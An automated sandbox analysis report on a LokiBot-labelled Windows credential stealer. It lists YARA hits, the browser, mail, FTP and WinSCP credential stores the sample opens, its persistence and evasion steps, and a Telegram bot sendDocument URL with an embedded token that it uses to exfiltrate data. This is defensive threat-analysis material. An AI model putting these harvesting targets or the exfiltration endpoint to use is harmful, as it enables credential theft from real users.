Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.43b9e58.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.443ad98.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.4400378.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.437f438.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.443ad98.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.4400378.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4526667510.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: z1E-catalogSamples.exe PID: 4856, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: z1E-catalogSamples.exe PID: 3472, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: vZkoWbol.exe PID: 6460, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: vZkoWbol.exe PID: 7324, type: MEMORYSTR
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.43b9e58.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.443ad98.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.4400378.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.437f438.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.443ad98.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.4400378.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: z1E-catalogSamples.exe PID: 4856, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: z1E-catalogSamples.exe PID: 3472, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: vZkoWbol.exe PID: 6460, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: vZkoWbol.exe PID: 7324, type: MEMORYSTR
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.43b9e58.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.443ad98.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.4400378.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.437f438.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.443ad98.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.4400378.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.4526667510.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: z1E-catalogSamples.exe PID: 4856, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: z1E-catalogSamples.exe PID: 3472, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: vZkoWbol.exe PID: 6460, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: vZkoWbol.exe PID: 7324, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.43b9e58.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.443ad98.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.4400378.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.437f438.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.443ad98.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.4400378.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4526667510.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: z1E-catalogSamples.exe PID: 4856, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: z1E-catalogSamples.exe PID: 3472, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: vZkoWbol.exe PID: 6460, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: vZkoWbol.exe PID: 7324, type: MEMORYSTR
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.43b9e58.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.443ad98.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.4400378.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.437f438.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.443ad98.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.vZkoWbol.exe.4400378.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: z1E-catalogSamples.exe PID: 4856, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: z1E-catalogSamples.exe PID: 3472, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: vZkoWbol.exe PID: 6460, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: vZkoWbol.exe PID: 7324, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Web Service
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      111
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      21
                      Input Capture
                      24
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      1
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Scheduled Task/Job
                      3
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      1
                      Query Registry
                      SMB/Windows Admin Shares1
                      Email Collection
                      11
                      Encrypted Channel
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                      Software Packing
                      NTDS211
                      Security Software Discovery
                      Distributed Component Object Model21
                      Input Capture
                      3
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets1
                      Process Discovery
                      SSH1
                      Clipboard Data
                      14
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading
                      Cached Domain Credentials141
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Process Injection
                      Proc Filesystem1
                      System Network Configuration Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 1428897
Sample: z1E-catalogSamples.exe
Start date: 19/04/2024
Architecture: WINDOWS
Score: 100

Signatures on the start node:
• Snort IDS alert for network traffic
• Found malware configuration
• Malicious sample detected (through community Yara rule)
• 12 other signatures

Contacted hosts from the start node:
• api.telegram.org (Uses the Telegram API (likely for C&C communication))
• api.ipify.org

Process tree (trailing numbers are the created-file / registry-value counts shown on the graph nodes):
• z1E-catalogSamples.exe (8) started
  • Dropped: C:\Users\user\AppData\Roaming\vZkoWbol.exe, PE32
  • Dropped: C:\Users\user\AppData\Local\...\tmp9244.tmp, XML
  • Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
  • Adds a directory exclusion to Windows Defender
  • Injects a PE file into a foreign processes
  • z1E-catalogSamples.exe (15 2) started
    • api.telegram.org 149.154.167.220, 443, 49706, 49708 TELEGRAMRU United Kingdom
    • api.ipify.org 104.26.12.205, 443, 49705, 49707 CLOUDFLARENETUS United States
    • Installs a global keyboard hook
  • powershell.exe (23) started
    • Uses schtasks.exe or at.exe to add and modify task schedules
    • Loading BitLocker PowerShell Module
    • WmiPrvSE.exe started
    • conhost.exe started
    • conhost.exe started
    • schtasks.exe (1) started
• vZkoWbol.exe (6) started
  • Multi AV Scanner detection for dropped file
  • Machine Learning detection for dropped file
  • vZkoWbol.exe started
    • Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
    • Tries to steal Mail credentials (via file / registry access)
    • Tries to harvest and steal ftp login credentials
    • Tries to harvest and steal browser information (history, passwords, etc)
  • schtasks.exe (1) started
    • conhost.exe started
  • vZkoWbol.exe started

Source | Detection | Scanner | Label
z1E-catalogSamples.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.LokiBot
z1E-catalogSamples.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\vZkoWbol.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\vZkoWbol.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.LokiBot

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://api.telegram | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 104.26.12.205 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
https://api.telegram.org/bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram | z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000346A000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
https://api.ipify.org | z1E-catalogSamples.exe, 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003201000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, vZkoWbol.exe, 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/ | z1E-catalogSamples.exe, 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003201000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, vZkoWbol.exe, 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://account.dyn.com/ | z1E-catalogSamples.exe, 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, vZkoWbol.exe, 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003306000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003388000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000036A3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000329A000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000346A000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000334D000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000327E000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003178000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ipify.org/t | vZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://api.telegram.org | z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000036A3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003707000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000346A000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000334D000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000327E000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003178000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | z1E-catalogSamples.exe, 00000000.00000002.2101535049.00000000031EB000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003201000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 00000007.00000002.2139622475.000000000326F000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000030E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.orgDAh | z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003306000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1428897
                                              Start date and time:2024-04-19 19:32:08 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 10m 42s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:z1E-catalogSamples.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@18/11@3/2
                                              EGA Information:
                                              • Successful, ratio: 75%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 169
                                              • Number of non-executed functions: 14
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target z1E-catalogSamples.exe, PID 4856 because it is empty
• Not all processes were analyzed; report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • VT rate limit hit for: z1E-catalogSamples.exe
Time | Type | Description
19:33:01 | API Interceptor | 8119555x Sleep call for process: z1E-catalogSamples.exe modified
19:33:03 | API Interceptor | 13x Sleep call for process: powershell.exe modified
19:33:04 | Task Scheduler | Run new task: vZkoWbol path: C:\Users\user\AppData\Roaming\vZkoWbol.exe
19:33:05 | API Interceptor | 5898905x Sleep call for process: vZkoWbol.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | W4tW72sfAD.exe | malicious | DCRat, PureLog Stealer, zgRAT |
149.154.167.220 | s.exe | malicious | Unknown |
149.154.167.220 | s.exe | malicious | Unknown |
149.154.167.220 | DHL.exe | malicious | AgentTesla |
149.154.167.220 | Sp#U251c#U0434ti.exe | malicious | DanaBot |
149.154.167.220 | Sp#U251c#U0434ti.exe | malicious | Unknown |
149.154.167.220 | s.exe | malicious | Unknown |
149.154.167.220 | pQTmpNQX2u.exe | malicious | DCRat |
149.154.167.220 | Sp#U251c#U0434ti.exe | malicious | Unknown |
149.154.167.220 | Sp#U251c#U0434ti.exe | malicious | Unknown |
104.26.12.205 | Sky-Beta.exe | malicious | Stealit | api.ipify.org/?format=json
104.26.12.205 | SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe | malicious | Bunny Loader | api.ipify.org/
104.26.12.205 | lods.cmd | malicious | Remcos | api.ipify.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.ipify.org | PO-095325.scr.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs | malicious | AgentTesla, GuLoader | 172.67.74.152
api.ipify.org | eOU2MVDmTd.exe | malicious | CredGrabber, Meduza Stealer, PureLog Stealer, zgRAT | 172.67.74.152
api.ipify.org | Receipt_032114005.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205
api.ipify.org | eO2bqORIJb.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | avp.msi | malicious | Unknown | 104.26.12.205
api.ipify.org | https://cvn7.sa.com/invoice.html?app= | malicious | HTMLPhisher | 172.67.74.152
api.ipify.org | TiKj3IVDj4.exe | malicious | Mint Stealer | 104.26.13.205
api.ipify.org | TiKj3IVDj4.exe | malicious | Mint Stealer | 104.26.12.205
api.ipify.org | KZWCMNWmmqi9lvI.exe | malicious | AgentTesla | 104.26.12.205
api.telegram.org | W4tW72sfAD.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
api.telegram.org | s.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | s.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | DHL.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | Sp#U251c#U0434ti.exe | malicious | DanaBot | 149.154.167.220
api.telegram.org | Sp#U251c#U0434ti.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | s.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | pQTmpNQX2u.exe | malicious | DCRat | 149.154.167.220
api.telegram.org | Sp#U251c#U0434ti.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | Sp#U251c#U0434ti.exe | malicious | Unknown | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | W4tW72sfAD.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
TELEGRAMRU | s.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | s.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | DHL.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | Sp#U251c#U0434ti.exe | malicious | DanaBot | 149.154.167.220
TELEGRAMRU | Sp#U251c#U0434ti.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | s.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | New Soft Update.exe | malicious | Unknown | 149.154.167.99
TELEGRAMRU | pQTmpNQX2u.exe | malicious | DCRat | 149.154.167.220
TELEGRAMRU | Sp#U251c#U0434ti.exe | malicious | Unknown | 149.154.167.220
CLOUDFLARENETUS | https://url.us.m.mimecastprotect.com/s/kCCtC5yEz0tWp5ANrfz_KPV?domain=paplastics365-my.sharepoint.com | malicious | HTMLPhisher | 104.17.2.184
CLOUDFLARENETUS | z42MNA2024000000041-KWINTMADI-11310Y_K.exe | malicious | GuLoader, Remcos | 172.67.191.112
CLOUDFLARENETUS | z14Novospedidosdecompra_Profil_4903.exe | malicious | GuLoader, Remcos | 104.21.60.38
CLOUDFLARENETUS | https://wetransfer.com/downloads/63408c72b6333965afb0118ce81f53d220240419112437/2452e85458854b24e1ec42e87285f82420240419112457/7d30d1?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgrid | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | https://edbullardcompany-my.sharepoint.com/:f:/g/personal/eric_rosario_bullard_com/EoLKvcaqSE1Go3fA5to5CQABtxAftKTD0ktrakp7rbi4Xg?e=Mvbf0D | malicious | HTMLPhisher | 172.64.41.3
CLOUDFLARENETUS | SecuriteInfo.com.W32.ABRisk.NVJI-4581.31168.9649.exe | malicious | Unknown | 104.21.75.43
